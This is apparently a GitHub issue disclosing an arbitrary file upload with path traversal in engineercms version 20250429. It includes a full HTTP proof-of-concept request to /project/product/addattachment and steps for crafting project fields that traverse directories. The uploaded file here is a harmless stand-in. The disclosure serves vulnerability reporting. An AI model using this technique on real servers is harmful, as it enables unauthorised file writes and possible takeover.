The engineercms has a file upload vulnerability.

### Summary
Version 20250429 of engineercms has a file upload vulnerability, allowing files with any suffix to be uploaded to the server across directories through the project editing function.
Vulnerability path:
/project/product/addattachment 

### Details
```
POST /project/product/addattachment HTTP/1.1
Host: 10.4.9.55:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=----geckoformboundary9fd62ad7c145696b62136695ff9e3321
Content-Length: 1133
Origin: http://10.4.9.55:8082
Connection: keep-alive
Referer: http://10.4.9.55:8082/project/25012
Cookie: hotqinsessionid=9467b51b76779ca0e37da0d21b491a39

------geckoformboundary9fd62ad7c145696b62136695ff9e3321
Content-Disposition: form-data; name="pid"

25012
------geckoformboundary9fd62ad7c145696b62136695ff9e3321
Content-Disposition: form-data; name="prodlabel"

111
------geckoformboundary9fd62ad7c145696b62136695ff9e3321
Content-Disposition: form-data; name="prodprincipal"


------geckoformboundary9fd62ad7c145696b62136695ff9e3321
Content-Disposition: form-data; name="id"

WU_FILE_0
------geckoformboundary9fd62ad7c145696b62136695ff9e3321
Content-Disposition: form-data; name="name"


------geckoformboundary9fd62ad7c145696b62136695ff9e3321
Content-Disposition: form-data; name="type"

image/png
------geckoformboundary9fd62ad7c145696b62136695ff9e3321
Content-Disposition: form-data; name="lastModifiedDate"

2025/6/24 16:01:26
------geckoformboundary9fd62ad7c145696b62136695ff9e3321
Content-Disposition: form-data; name="size"

27440
------geckoformboundary9fd62ad7c145696b62136695ff9e3321
Content-Disposition: form-data; name="file"; filename="test.dll"
Content-Type: image/png

11
------geckoformboundary9fd62ad7c145696b62136695ff9e3321--

```
Create a new project, set the values of the number and name fields to construct path traversal.

![Image](https://github.com/user-attachments/assets/740644fe-609f-4c12-aec1-be5390a374cc)
Enter the project and upload files:

![Image](https://github.com/user-attachments/assets/6065d4aa-5d9b-40a8-8889-f80232f8b162)
The request package is as follows:

![Image](https://github.com/user-attachments/assets/19dc4911-f90d-49e2-b9c2-9e8ad19c0e86)
At this point, the file is uploaded across directories to the "Documents" directory.

![Image](https://github.com/user-attachments/assets/4d5a94c7-4125-4891-8b34-127a470a01cc)

### Code
The processing function corresponding to the upload request path "/project/product/addattachment" is as follows:

![Image](https://github.com/user-attachments/assets/334bbc14-3e46-465f-96ed-e49a673f4f99)
The variable that holds the final uploaded file path is filepath:

![Image](https://github.com/user-attachments/assets/af16e678-2ea0-403e-84a3-d722984da583)
The composition of the filepath variable is as follows:

![Image](https://github.com/user-attachments/assets/c7967e76-6786-4316-9052-d9db36448916)
The value of the DiskDirectory variable is directly concatenated with the project number and name, which leads to path traversal.

![Image](https://github.com/user-attachments/assets/d78c11a7-f051-4b9f-ac2f-26590642f20d)

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

The engineercms has a file upload vulnerability. #94

Summary

Details

Code

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

The engineercms has a file upload vulnerability. #94

Description

Summary

Details

Code

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions